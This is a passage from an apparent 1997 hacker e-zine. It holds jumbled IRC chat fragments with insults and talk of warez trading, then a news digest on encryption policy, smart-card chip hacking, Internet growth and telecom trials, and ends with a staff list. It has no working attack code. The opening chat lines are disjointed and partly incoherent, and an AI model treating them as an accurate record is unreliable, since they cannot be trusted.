  • it'd help if he had it that doesn't make the world a safer place so7o: Dude.. face it so7o, so ppl/groups like c0d3z3r0 don't get it and use it to trade juarez === (signoff\#phrack) VC[VC@rhat.cts.com] @[02:20:48am] [Ping timeout] so7o: You're just a moron trying to look like yew have reet0 k03z my k0dez > your sssss haha Yea nice to see you admit it Yew know what kode I loved a lot is that scripting?
  • hi Let me make sure Im accurate here. i wont code for linux anymore tho, too many stupid people ask me linspy questions ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ The News Compiled and edited by KungFuFox 1 : Huge jump seen in PCs linked to net 2 : Hackers vie for $1-million reward 3 : Digitizing Your Meter Reader 4 : AT&T Tests New `00' INFO Directory Assistance Service 5 : Bellcore Scientists See Cold-Weather Problems... 6 : Is the Internet a Matter of National Security? 7 : Hacking Smart Card Chips: At What Cost? 8 : House Panel Rejects Crypto Amendment 9 : Internet Addict Placed on Probation in Ohio - from FH tell you and your lame friends not to prank call me ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Huge jump seen in PCs linked to net The number of personal computers connected to the Internet will jump 71% by the end of the year to 82 million, driven by use in the business market, says market research firm Dataquest Inc. By 2001, about 268 million computers will be linked to the global computer network, according to a recent study. That will lead to more sales of Internet software and services, which are expected to rise 60% to $12.2 billion (U.S.) by the end of the year, up from $7.5 billion last year. The Internet software and services market is expected to reach $32.2 billion by 2001, with the services market alone reaching $7 billion in 1997 and rising to $29 billion by 2001, says Dataquest. (Toronto Financial Post 21 Aug 97) ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Hackers vie for $1-million reward Austin, Texas start-up Crypto-Logic Corp. has offered a $1-million reward to whomever can crack its new e-mail encryption system within a year. Cryptologists generally agree that Crypto-Logic's technology, called a "one-time pad" is theoretically uncrackable -- each "pad" has a set of uniquely random digital symbols that are coded to the actual message. The recipient uses the same pad to decode the message, and each pad is used only once. Still, experts are warning never to underestimate the tenacity of computer hackers: "Anyone who says their system is bulletproof is either a liar or stupid," says one. "If I'm wrong," says Crypto-Logic's VP and COO, "we're out of business." http://www.ultimateprivacy.com (Wall Street Journal 22 Aug 97) ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Digitizing Your Meter Reader by Gene Koprowski 18.Sep.97.PDT -- A visit from the meter man is rarely a cherished event. Meter readers dread the prospect of crazed canines, and customers don't much like strangers tromping through their yard or basement. To automate this timeworn process, utility companies are piloting programs that use customized networking technology to remotely read meters and monitor the energy usage of specific appliances. A technology trial at Nashville Electric Service, a division of the Tennessee Valley Authority - the Depression-era creation of President Franklin Roosevelt - will link consumers to the energy company via a computer network. The technology behind the service - developed by Nortel and TeCom - provides automatic meter reading, outage detection, and remote connect and disconnect capabilities. To test the service, Nashville Electric is installing a network router and digital meter reader in the homes of 100 residential customers - and in the offices of about 40 customers. These meters will be linked to LANs and PCs, creating a bi-directional consumer electronics network: Individual appliances, like a toaster, microwave or refrigerator, will be online, enabling consumers to monitor their usage down to the kilowatt, said TeCom spokesman Mike Mahoney. "It will allow users to analyze their usage patterns, as they do with long-distance phone bills," Mahoney said. "If the toaster is using too much energy, they can reduce their toasting activity." The technology project was inspired by the move toward deregulation in the utility industry, said Teresa Corlew, a spokeswoman for Nashville Electric. Companies are looking for ways to show consumers how they can lower costs; technology is one way to do that. "We want to run the test for a year and then assess the results," she said. "After that, we may roll it out to the entire area." Those participating in the test are volunteers who happen to have PCs in their home and are concentrated in an area of the city that relies primarily on electric service, rather than gas. The voluntary nature of the test may be smart marketing for Nashville Electric. In Roselle, Illinois, a suburb of Chicago, a water meter-reading system was recently installed that employs the telephone network. All residents must comply with the system by January, or they will be fined. But, says Darcy Bretz, a local resident, several people in the suburb don't like the idea because they think that their phones are being tapped and that their privacy is being invaded. Other experiment-minded locales are examining wireless data networks, which will be online for tests in Massachusetts and Rhode Island by early 1998, using a small, low-cost radio device that is hooked to an existing meter. Its hoped that the technology's unobtrusiveness will win over consumers - observers indicate that customer-preference must drive these trials. "This kind of thing is starting to go on all over the industry," said Lori DeMatteis, a senior associate at Metzler Associates, a Chicago-based energy consultant. "There are a lot of different technologies and billing systems that are emerging, but no clear winner yet. There will be several benefits that users will see. There will be increased accuracy in billing, for instance. Also, you won't have to worry about the man entering your yard, and they don't have to worry about your dog." ©1993-97 Wired Ventures, Inc. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ AT&T Tests New `00' INFO Directory Assistance Service September 22, 1997 Directory Assistance the Way Customers Really Want It SEATTLE, Sept. 22 PRNewswire -- AT&T today announced that it will conduct a market trial of its new AT&T "00" INFO(SM) (Double-0 Info) national directory assistance service in the Seattle area. Beginning today, AT&T customers in Seattle will be able to dial "00" to obtain telephone listings for any place in the United States with one simple phone call -- even if they don't have the area code or exact city. In marked contrast to the industry trend to provide fully automated directory assistance, AT&T "00" INFO Service features personal, courteous, helpful service from specially trained AT&T information assistants who will stay on the line for the entire call. From the moment they greet the customer by introducing themselves, AT&T assistants are there to help customers simplify their lives, by searching for a directory listing with as little information as a partial name and a locality or state. And AT&T assistants will stay with the customer through the end of the call when they provide the requested information. "We're providing directory assistance the way customers really want it," said Howard McNally, vice president of AT&T Consumer Markets Division. "AT&T is bringing back the personal touch. Not only will we stay on the line with our customers, but we'll do everything within our power to meet their needs -- using enhanced search features to find the listings they want, and even the address and zip code, if that's what they need." In addition to personal service, AT&T "00" INFO also includes several new search capabilities: * A new expanded search capability allows AT&T information assistants to extend a directory search to surrounding communities when they can't find a requested listing in a designated city or town -- even if the caller doesn't know what those communities are. * A key word search function allows AT&T information assistants to search for a business listing when the caller doesn't know the full or exact name of the business. This search will find the listing if the key word appears anywhere in the name. Seattle is one of only five service markets in the United States to be selected to test the new AT&T "00" INFO Service. The other test sites are Minneapolis, Phoenix, Denver and Portland, Ore. AT&T customers in these trial markets need only dial one simple number, "00," from their home phone to reach an AT&T information assistant who will help them find telephone listings anywhere in the United States. This means they no longer need to dial multiple numbers for directory assistance, or know whether the desired number is local or long distance. And since they don't need to know the area code to get a listing, customers no longer need to make two calls for a listing -- the first for the area code, and the second for the telephone number. During the market trial, AT&T is offering the new AT&T "00" INFO Service at the same 95-cent price for two listings that it charges for its conventional directory assistance. In addition, customers can request an unlimited number of listings on a single call. When AT&T customers dial "00" from their home phones, they will hear the familiar AT&T acknowledgment, followed by an automated system prompting them to press "1" for AT&T "00" INFO directory assistance. AT&T "00" INFO Service is also available to AT&T customers in the (CITY) area even when they are away from their residence phone. By dialing 1-800-CALL-ATT, followed by Prompt "4," customers will be connected to AT&T "00" INFO directory assistance. The AT&T "00" INFO directory assistance service trial is limited to listings in the United States. SOURCE AT&T ©PR Newswire. All rights reserved. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Bellcore Scientists See Cold-Weather Problems (And Possible Solutions) For Dense WDM Cables September 22, 1997 SAN DIEGO, Calif.--(BUSINESS WIRE)--September 22, 1997--Cold weather presents important challenges to dense-wavelength-division-multiplexing technology, but those challenges can be overcome by prudent risk-assessment and proper network planning, Bellcore scientists revealed today. The scientists, Gabor Kiss, Osman Gebizlioglu, Dean Rader and Casey Wieczorek, published their observations in a paper delivered today at the National Fiber Optic Engineering Conference, here. The paper, "New Developments in Temperature-Induced Cable Loss," is one of a series of studies on fiber-optic cable performance made by Bellcore over the past five years. "We've known for awhile that cold weather changes the internal geometry of fiber-optic cable, and that this change bends the optical fibers in ways they weren't designed to be bent," said Kiss. "However, we also knew that this was something we could live with in equipment operating at 1310 nanometers. With dense WDM transmission, which happens at 1550 nanometers, the loss becomes much worse." Kiss added that some makers of DWDM systems plan to use 1625 nanometers for network supervision. "Our study indicates that this supervision would fail long before the network failed at 1550 nanometers," Kiss said. Finally, Kiss pointed out that extremely cold weather can affect both the "working" and "protected" channels -- that is, the fiber being used and the fiber being held in reserve. "That means that temperature-induced cable loss over a wide geographic area may frustrate a diverse-routing protection scheme," Kiss said. Kiss, Gebizlioglu, Rader and Wieczorek subjected cables to several years of simulated seasonal cycles and monitored the loss in their laboratory in Morristown, New Jersey. They also conducted field tests on cables at Bellcore's research facility in Chester, New Jersey, and in Maine. For equipment suppliers and network operators, Kiss said, this news should be sobering, but not discouraging. "The fact is that there are ways to assess the individual risk faced by particular products in particular environments, and Bellcore is available to assess that risk and work toward a way to minimize it," Kiss said. Kiss and his colleagues are also engaged in writing Bellcore generic requirements for DWDM equipment, and for fiber-optic cable. Bellcore, headquartered in Morristown, New Jersey, is a leading provider of communications software, engineering and consulting services based on world-class research. Bellcore creates business solutions that make information technology work for telecommunications carriers, businesses and governments worldwide. Bellcore has sales offices throughout the United States, Europe, Central and South America, and the Asia-Pacific region. On November 21, 1996, SAIC (Science Applications International Corporation) announced that it had agreed to purchase Bellcore once requisite regulatory approvals had been obtained. More information about Bellcore is available at its Web site, www.bellcore.com ©Business Wire. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Is the Internet a Matter of National Security? Monday, September 22, 1997 Gary Chapman Is Director of the 21st Century Project at the University of Texas at Austin. he Can Be Reached at Gary.chapman@mail.utexas.edu Slowly but surely, step by incremental step, the Internet is being pulled into the forbidding black hole of "national security." Several recent developments have raised warning flags that the global communications network is now regarded as the turf of the people and institutions left over from the Cold War. On Sept. 5, the President's Commission on Critical Infrastructure (http://www.pccip.gov/) released a report calling for a huge increase in funding for protection of the "critical systems" of the nation, including electric power distribution, telecommunications, banking and finance, water, transportation, oil and gas storage and transportation, emergency services and government services. The commission recommended doubling the current federal R&D budget of $250 million for protecting these systems, with increases of $100 million each year after 1999 to $1 billion per year by 2004. The commission's chairman, retired Air Force Gen. Robert T. Marsh, told the Associated Press ([Company Capsule]), "These are the life-support systems of the nation. They're vital, not only for day-to-day discourse, they're vital to national security. They're vital to our economic competitiveness worldwide, they're vital to our very way of life." Ten days ago, the House Select Committee on Intelligence in the U.S. Congress voted to require that all technology for encrypting data provide a "key" that could be obtained by law enforcement or national security officials. The vote reversed a trend toward relaxing such controls--one of the chief political goals of the high-tech industry. Committee members cited the warnings they received in "classified briefings" as the main reason for their vote. Later this month there will be a high-level conference in Chicago titled "The Information Revolution: Impact on the Foundations of National Power," hosted by the Center for Strategic and International Studies (http://www.csis. org) and featuring many of the graybeards of the national security state, such as arms control negotiator Paul Nitze, former Georgia Sen. Sam Nunn, Bob Galvin of Motorola and ubiquitous conservative pundit William Bennett. This signifies the discovery of the Internet by the highest mandarins of the American power establishment, and the title of the conference frames the subject in an ominous fashion. This summer I was visited by, and gave a briefing to, a delegation of Washington experts from the intelligence community--about a dozen gentlemen from the CIA, the National Security Agency, the Treasury Department and the Pentagon. It was at this meeting that I first heard the explicit statement that the Internet is now regarded as a critical national asset that these agencies believe needs their protection and attention. The Internet, of course, has always been linked to the Defense Department--it began, in the late 1960s, as a defense research project, and the Defense Advanced Research Projects Agency was its overseer until 1983. But the Pentagon never considered the Internet (or Arpanet, as it was known until 1983) to be a "critical" communications network. There is a persistent myth that the Internet was developed in a particular way to sustain damage in a nuclear attack, but this was never true, as is pointed out in the definitive history of the Net, "When Wizards Stay Up Late," by Katie Hafner and Matt Lyon. The Internet was always a research project and chiefly a means to pass information between incompatible computer systems. But now the Internet is increasingly embedded in the nation's economic life. More and more commerce is conducted on the Internet. Basic utilities, like power and water, are beginning to use Internet-related computer networks for monitoring services. The federal government is increasingly dependent on computer-mediated communication over networks. Many people in positions of power see the Internet as a precursor to a vast global infrastructure of commerce and communication that the U.S. is likely to dominate. Whatever global empire the U.S. will have in the 21st century is likely to depend on this technology. This global character of the Internet raises an interesting paradox for the national security community. The Internet promises easy global commerce for companies, no matter where they're physically located. These companies have an intense interest in computer security, but they tend to be wary, if not hostile, to national security imperatives. When the Reagan administration, in the mid-1980s, attempted to implement a new security classification for digital information called "sensitive not secret," the private sector rebelled, and the proposal was killed. In the same period, manufacturers of supercomputers and high-end workstations chafed at Pentagon export controls. Now the battle is being waged over encryption, and last week's defeat for business may raise the stakes. The House committee vote "is a disaster," said Rebecca Gould, vice president for public policy at the Business Software Alliance (http://www.bsa.org). Business leaders outside the defense industry have long had a strained relationship with the spooks and Dr. Strangeloves of the national security community. During World War I, for example, Henry Ford and other major industrialists were pacifists and globalists who railed against militarism, jingoism and paranoia. The military responded by accusing Ford and his supporters of greed, obsession with profits, and a lack of patriotism. For most of the first half of this century, U.S. business leaders believed the military and its attitudes were the chief enemies of commerce, which they regarded as the foundation of world peace. These days, with the Internet firmly in the hands of the private sector, the noises coming from the Pentagon, the CIA and the FBI are much more conciliatory--they promise to "work with industry" to help "secure" the nation's "critical systems." But this contemporary savoir-faire should make us even more nervous. Looming before us is the absorption of the free and open Internet into the gloomy abyss of classified information, black budgets, secrecy, surveillance, shadowy characters, macho patriotic posturing, and all the other trappings of "national security." ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Hacking Smart Card Chips: At What Cost? 09/25/97 By Mo Krochmal, TechWeb LONDON -- Mondex International, developer of one of the world's leading electronic cash cards, has come under fire from a security expert for allegedly underestimating the ability of criminals to hack into its products. The E-cash pioneer, which is controlled by MasterCard International, announced Monday its latest chip, the H8/3109 device developed by Hitachi. E-cash cards let users pay for goods and services with electronic tokens that can be freely exchanged for paper money and coins money in banks. Mondex, which said it plans to market 5 million E-cash cards by the end of 1998, said in a statement that the chip had undergone "fault-analysis interrogation by some of the leading chip and security laboratories in the world." But Mondex was criticized Monday by a leading academic cryptography expert for underestimating the risks of the card being hacked. Ross Anderson, a professor at Cambridge University in England, said the technical sophistication of the security measures taken by Mondex do not reflect the high level of technology and skills available to criminals. "I think Mondex picked an inappropriate time to go for a world launch. There are too many new attacks -- people are looking at things all the time," Anderson said. "If something is released today, there is no guarantee it will be good three months from now. In five or 10 years, things will have stabilized." The Mondex card was the subject of rumors earlier this month that it had been successfully hacked, following a presentation at the Eurocrypt cryptography conference this summer. The Eurocrypt presentation showed that the surface wiring of a silicon chip, which was not identified by name, could be manipulated in a way that allowed access to the information stored inside. According to a document posted on the Web, Mondex was the subject of the attack described at Eurocrypt. The anonymous posting said an ion beam was used to reconnect a link on the surface of a Mondex chip, letting the memory be output to the card's serial port. Mondex denied the claim Wednesday. John Beric, head of security at Mondex, said the type of attack described at Eurocrypt had not been state-of-the-art for many years. He added that the Mondex chip design was adapted in 1992 to take into account such an attack. Mondex chips are still tested for attacks such as those described in the anonymous posting, he said. "No system is perfect. We go on the contingency that something horrible is going to happen, and we have contingency plans so we can tolerate a loss and stem it where we can," Beric said. Mondex and chip manufacturers argue that the high cost of hacking into a single chip, " a process which requires skill and expensive equipment," means hacking cards is uneconomic, because breaking one chip's security doesn't necessarily breaking into other chips. "Any chip can be compromised, the question is: How much money does it cost to compromise the chip? The goal is to make the cost of compromising the chip greater than the value of compromising the chip," said Thomas Horton, smart card microchip product manager at Hitachi. But some academics said the chip industry's cost-benefit argument is flawed. Hacking, or reconfiguring a chip, "is a routine process," according to John Orloff, a professor at the Laboratory for Ion Beam Research and Applications at the University of Maryland, in College Park. Orloff said a technician with access to a focused ion-beam machine and intimate knowledge of a chip could "lay down a few microns" and reconstitute something such as a severed link on a chip in just 30 minutes. The machinery to do something like that is not cheap, Orloff said, but it is common in semiconductor labs and universities. ©CMP Media, 1996. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ House Panel Rejects Crypto Amendment by Rebecca Vesely 24.Sep.97.PDT -- After nearly four hours of wrangling, the House Commerce Committee today passed a market-friendly encryption bill, voting down an amendment 35-16 that would have imposed strict domestic controls on encryption. "Throughout this debate in the past few weeks, the members have been swinging towards privacy," Representative Edward Markey (D-Massachusetts) told reporters after the vote. "I think that's going to happen in every single public debate that's held." The Security and Freedom through Encryption Act, sponsored by Representative Bob Goodlatte (R-Virginia), passed in a 40-11 vote with an amendment that strengthens penalties for using encryption in a crime from five years to 10. The amendment, sponsored by Markey and Representative Rick White (R-Washington), also establishes a "national encryption technology center" in which companies would work with law enforcement on encryption technologies, although where funding for the center would come from or who would participate is undefined. But the committee and the House remain deeply divided over just how much access law enforcement should have to digital communications. Despite two weeks of 'round-the-clock staff work and lobbyists haunting members and aides, panel members could not find a compromise between law enforcement and privacy concerns. In fact, many could not understand why technology can't sort the whole mess out. "If these cryptographers are so smart, why don't they invent some decryption devices for law enforcement?" asked Representative Mike Oxley (R-Ohio), a former FBI agent and chief sponsor of the pro-law-enforcement amendment that failed. Arguments for the need for law enforcement to access encrypted data surfaced again and again, as members pointed out that drug cartels use strong encryption to secure their data. "Computers and the Internet have become fertile ground for terrorists, drug cartels, and child pornographers," said Representative Greg Ganske (R-Iowa). But the committee majority appeared to be swayed by the argument that the wide availability of strong encryption on the global market made Oxley's proposal - to prevent all Americans from using encryption without immediate access to plaintext by law enforcement - illogical. "This is the Prohibition of the electronic age," said Representative Anna Eshoo (D-California). "People drank anyway. Liquor was out there, and it was easy to make." Markey said the Oxley proposal's requirement for easy access to encrypted data could become the "Achilles' heel of electronic commerce." The bill's next test: the House Rules Committee, which will decide in what form, if any, the bill will reach the House floor. Two weeks ago, the House Intelligence and National Security committees passed a series of amendments, one similar to Oxley's, that would undercut the intent of Goodlatte's original legislation. Rules Committee chair Gerald Solomon (R-New York) sent a letter to Commerce Committee members warning them that he will block any variation on the Goodlatte bill that does not carry the strong key recovery provision Oxley tried to get passed. Goodlatte told reporters after the Commerce panel session that he is going to work immediately to try to get the bill over the next hurdle. "We are certainly going to be working with the leadership and the Rules Committee to make sure everybody who has an opinion about this gets heard and that we design a bill that will have strong bipartisan support," he said. Goodlatte still faces a long road. The bill has 252 House co-sponsors - a solid majority should it reach the floor. But it would still have to be reconciled with radically different Senate legislation and gain President Clinton's signature before it becomes law. ©1993-97 Wired Ventures, Inc. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Internet Addict Placed on Probation in Ohio - from FH CINCINNATI (Reuter) - An Ohio woman described by police as an Internet addict was placed on two years probation Tuesday for neglecting her three small children while spending several hours a day on her home computer. Police said Sandra Hacker, 24, kept her three children in deplorably filthy conditions in a separate room of her apartment, while devoting her time to the Internet. Judge William Mallory of Cincinnati Municipal Court also fined Hacker $100 and court costs and suspended a 180-day jail sentence on condition that she take parenting classes under supervision of probation officials. The children, ages 2, 3, and 5, have been in the custody of her estranged husband since she was arrested on the neglect charges earlier this year, her attorney, John Burlew, told Reuters. Permanent custody rights will be determined in a divorce proceeding in which the couple is now involved, he said. ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : thtj communications, inc.³ ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Editor-in-Chief: Scud-O, scud@thtj.com Executive Editor: KungFuFox, mazer@cycat.com Submissions Editor: Keystroke, keystroke@thepentagon.com Distribution Editor: Malhavoc, malhavoc@thtj.com Site Manager: Scud-O, scud@thtj.com Content Editors: FH, fh@sinnerz.com Malhavoc, malhavoc@thtj.com Phrax, phrax@thtj.com Staff Writers: memor, memor@thtj.com ArcAngel, arcangel@thtj.com lurk3r, Shok, The Messiah, tm@sinnerz.com ÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ A-th-a-th-a-th-a-that's all folks! Ú--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ : - End of Communique - ³ ú-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ